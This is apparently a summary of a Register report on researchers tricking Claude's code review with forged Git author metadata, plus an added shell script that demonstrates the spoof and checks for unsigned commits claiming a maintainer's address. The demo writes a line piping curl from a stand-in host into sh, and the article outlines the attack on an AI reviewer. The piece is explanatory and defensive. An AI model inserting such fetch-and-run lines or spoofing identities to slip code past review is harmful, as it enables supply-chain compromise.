The Register · Anthropic · 1 min read

Git identity spoof fools Claude into giving bad code the nod

AI Article Analysis

Security researchers have found that Anthropic's Claude AI can be tricked into approving malicious code by forging Git commit metadata. Using just two Git commands to spoof a trusted developer's identity, the researchers showed that Claude reviewed hostile changes as though they came from a known maintainer, and scrutinised them far less closely as a result.

The attack exploits Claude's reliance on Git metadata to decide how much to trust a change. Git does not verify the author or committer name and email recorded in a commit; whoever creates the commit sets them, so they carry no proof of identity unless the commit is cryptographically signed and the signature is checked against a known key. When the AI sees commits that appear to come from established project maintainers, it applies less rigorous security analysis. The flaw illustrates a broader weakness in how AI systems authenticate their information sources, particularly when the source is an external system whose data is trivial to manipulate.

The findings underscore emerging risks as AI systems are woven into development workflows and decision-making. AI code reviewers that trust metadata without independent verification could become a vector for supply chain attacks. The research also raises the question of how organisations should configure and deploy AI tools in environments where an attacker might try to slip compromised code into critical projects.
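The mechanism described in the two paragraphs above, as an added example that is not from The Register article, from the researchers, or from Anthropic: a shell script that builds a throwaway repository, records a commit whose author field claims to be a trusted maintainer, and then runs the check a reviewer (human or AI) should apply before treating the commit as the maintainer's work. The article's exact two-command spoof is not reproduced here; the script uses `git commit --author`, one of several equally unverified ways to set the same field. The maintainer address, the attacker identity, the file contents and the commit messages are all constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the article, the researchers, or Anthropic): show
# that Git author metadata is self-asserted, and flag commits that claim a
# trusted author without a verified signature. All names, addresses and file
# contents below are constructed for the demonstration.
set -eu

# Assumption: the project's known maintainer address.
TRUSTED_EMAIL="maintainer@example.com"

# Build a throwaway repository containing one honest commit and one commit
# whose author field is forged. Prints the repository path.
make_demo_repo() {
  # Make the demo independent of any identity the calling environment sets.
  unset GIT_AUTHOR_NAME GIT_AUTHOR_EMAIL GIT_COMMITTER_NAME GIT_COMMITTER_EMAIL
  repo=$(mktemp -d)
  git -C "$repo" init -q
  printf 'print("hello")\n' > "$repo/app.py"
  git -C "$repo" add app.py
  git -C "$repo" -c user.name="Mallory" -c user.email="mallory@example.net" \
    -c commit.gpgsign=false commit -q -m "initial import"
  # Forged commit: --author rewrites the author field to the maintainer's
  # identity, and Git performs no verification at all. (Setting user.name and
  # user.email would spoof the committer field just as easily.)
  printf 'import os; os.system("curl http://evil.example/x | sh")\n' >> "$repo/app.py"
  git -C "$repo" add app.py
  git -C "$repo" -c user.name="Mallory" -c user.email="mallory@example.net" \
    -c commit.gpgsign=false \
    commit -q --author="Trusted Maintainer <$TRUSTED_EMAIL>" -m "minor cleanup"
  printf '%s\n' "$repo"
}

# The check: list commits whose author claims the trusted address but whose
# signature status (%G?) is not G, i.e. not a good signature from a key the
# verifier trusts. Unsigned commits report N. One line per hit:
# hash, signature status, author email, committer email.
unverified_trusted_commits() {
  git -C "$1" log --format='%H %G? %ae %ce' \
    | awk -v trusted="$TRUSTED_EMAIL" '$3 == trusted && $2 != "G" { print }'
}

# Stand-alone run: build the repo and print what a metadata-only trust check
# would have accepted as the maintainer's change.
if [ "${1:-}" = "demo" ]; then
  repo=$(make_demo_repo)
  echo "Commits claiming $TRUSTED_EMAIL without a verified signature:"
  unverified_trusted_commits "$repo"
fi
```

Run it with `sh spoof-check.sh demo`: the forged commit is listed with status N, a maintainer author address and a different committer address, which is exactly the combination a reviewer should refuse to treat as trusted. Note that the status G is only as meaningful as the keys the verifier accepts; `%G?` and `git verify-commit` need a keyring or an `gpg.ssh.allowedSignersFile` populated with the maintainers' actual keys, otherwise a signature from any key the attacker controls would pass as well. Hosting platforms' "verified" badges and the authenticated account behind a pull request are the other independent signals a reviewer can use instead of the free-text author field.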

Key Takeaways

  • Researchers showed that Claude can be steered into approving malicious code by forging the author metadata on a Git commit.
  • Two Git commands were enough to make hostile changes appear to come from a known maintainer, and Claude reviewed them with noticeably less scrutiny.
  • Git does not verify commit author or committer fields; only a checked cryptographic signature ties a commit to an identity.
  • AI code reviewers that treat such metadata as a trust signal without independent verification can become a supply chain attack vector.

Read the full article on The Register
